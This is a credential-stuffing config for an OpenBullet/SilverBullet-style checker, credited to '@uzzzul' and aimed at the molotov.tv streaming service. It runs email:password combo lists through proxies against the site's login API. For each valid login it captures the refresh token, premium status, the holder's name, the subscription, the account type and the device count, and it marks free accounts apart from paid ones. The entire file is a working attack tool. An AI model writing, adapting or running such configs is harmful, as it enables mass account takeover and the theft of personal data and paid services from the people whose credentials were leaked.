[SETTINGS]
{
  "Name": "molotov tv",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-12-19T15:19:21.1763287+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "molotov tv",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": "by @uzzzul",
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#login REQUEST POST "https://fapi.molotov.tv/v3.1/auth/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"grant_type\":\"password\"}" 
  CONTENTTYPE "application/json" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "content-length: 81" 
  HEADER "content-type: application/json" 
  HEADER "origin: https://www.molotov.tv" 
  HEADER "referer: https://www.molotov.tv/" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "sec-gpc: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" 
  HEADER "x-molotov-agent: {\"app_build\":1,\"app_id\":\"customer_area\",\"api_version\":8,\"type\":\"desktop\",\"os\":\"windows\",\"manufacturer\":\"\",\"model\":\"\",\"brand\":\"\",\"serial\":\"\"}" 
  HEADER "x-molotov-website: customer_area" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Vos identifiants sont incorrects. Veuillez réessayer." 
    KEY "103" 
  KEYCHAIN Success OR 
    KEY "{\"profile_id\":" 
    KEY "profile_id" 

#tk PARSE "<SOURCE>" JSON "refresh_token" -> VAR "tk" 

#is_premium PARSE "<SOURCE>" JSON "is_premium" CreateEmpty=FALSE -> CAP "is_premium" 

#user_type PARSE "<SOURCE>" JSON "user_type" CreateEmpty=FALSE -> CAP "user_type" 

#first_name PARSE "<SOURCE>" JSON "first_name" CreateEmpty=FALSE -> CAP "first_name" 

#last_name PARSE "<SOURCE>" JSON "last_name" CreateEmpty=FALSE -> CAP "last_name" 

#Subscription PARSE "<SOURCE>" LR "7B7F8D\"}]},\"long_formatter\":{\"format\":\"%s\",\"parts\":[{\"title\":\"" "\"," CreateEmpty=FALSE -> CAP "Subscription" 

#Account_Type PARSE "<SOURCE>" LR "badge\":{\"type\":\"" "\"," CreateEmpty=FALSE -> CAP "Account Type" 

#devices PARSE "<SOURCE>" LR "],\"devices\":" "," CreateEmpty=FALSE -> CAP "Devices" 

KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"is_premium\":false," 
    KEY "<Account Type>" Contains "free" 
    KEY "<user_type>" Contains "free" 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "\"is_premium\":false," 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

